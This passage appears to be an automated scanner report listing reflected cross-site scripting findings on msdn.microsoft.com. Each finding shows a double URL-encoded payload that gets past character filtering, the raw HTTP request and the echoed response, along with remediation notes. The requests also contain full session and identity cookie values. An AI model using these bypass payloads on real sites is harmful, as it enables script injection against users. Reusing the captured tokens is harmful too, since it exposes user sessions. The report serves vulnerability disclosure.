The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usfbc85%2522%253e%253ca%253e836b0a1a57e/library/aa155073.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfbc85"><a>836b0a1a57e/library/aa155073" />
...[SNIP]...

2.20. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155073.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc097%2522%253e%253ca%253e0c9278f4fd1 was submitted in the REST URL parameter 2. This input was echoed as fc097"><a>0c9278f4fd1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryfc097%2522%253e%253ca%253e0c9278f4fd1/aa155073.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfc097"><a>0c9278f4fd1/aa155073" />
...[SNIP]...

2.21. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155073.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67843%2522%253e%253ca%253ee5b048815e6 was submitted in the REST URL parameter 3. This input was echoed as 67843"><a>e5b048815e6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa155073.aspx67843%2522%253e%253ca%253ee5b048815e6 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155073.aspx67843"><a>e5b048815e6" />
...[SNIP]...

2.22. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa187916.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83582%2522%253e%253ca%253e41cf0a39ac3 was submitted in the REST URL parameter 1. This input was echoed as 83582"><a>41cf0a39ac3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us83582%2522%253e%253ca%253e41cf0a39ac3/library/aa187916.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us83582"><a>41cf0a39ac3/library/aa187916" />
...[SNIP]...

2.23. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa187916.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2c1%2522%253e%253ca%253ed10d1626b7c was submitted in the REST URL parameter 2. This input was echoed as da2c1"><a>d10d1626b7c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryda2c1%2522%253e%253ca%253ed10d1626b7c/aa187916.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryda2c1"><a>d10d1626b7c/aa187916" />
...[SNIP]...

2.24. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa187916.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e58%2522%253e%253ca%253eb41c43eaea6 was submitted in the REST URL parameter 3. This input was echoed as 56e58"><a>b41c43eaea6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa187916.aspx56e58%2522%253e%253ca%253eb41c43eaea6 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 